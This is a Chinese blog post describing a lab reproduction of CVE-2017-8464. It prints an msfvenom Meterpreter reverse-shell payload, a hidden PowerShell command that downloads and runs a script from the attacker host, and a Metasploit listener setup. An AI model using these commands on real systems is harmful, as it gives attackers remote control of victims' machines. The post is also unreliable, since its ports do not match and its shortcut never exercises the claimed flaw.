CVE-2017-8464复现(远程快捷方式漏洞)

我们的攻击机IP是192.168.222.133  

目标机IP是192.168.222.132

我们首先生成一个powershell

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.222.133 LPORT=444 -f psh-reflection>1.ps1

image 100 - CVE-2017-8464复现(远程快捷方式漏洞)

把生成的1.ps1 copy到/var/www/html cp /root/1.ps1 /var/www/html

image 101 - CVE-2017-8464复现(远程快捷方式漏洞)

service apache2 start 然后我们访问127.0.0.1/1.ps1 是可以访问的

image 102 - CVE-2017-8464复现(远程快捷方式漏洞)

我们在目标机创建快捷方式powershell -windowstyle hidden -exec bypass -c “IEX (New-Object Net.WebClient).DownloadString(‘http://192.168.222.133/1.ps1’);test.ps1”

然后访问

image 103 - CVE-2017-8464复现(远程快捷方式漏洞)

创建监听,然后连接meterpreter

msfconsole

set PAYLOAD windows/x64/meterpreter/reverse_tcp

set LHOST 192.168.222.133

set LPORT 4444

exploit

image 104 - CVE-2017-8464复现(远程快捷方式漏洞)

复现成功

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发
头像
欢迎您留下宝贵的见解!
提交
头像

昵称

取消
昵称表情代码图片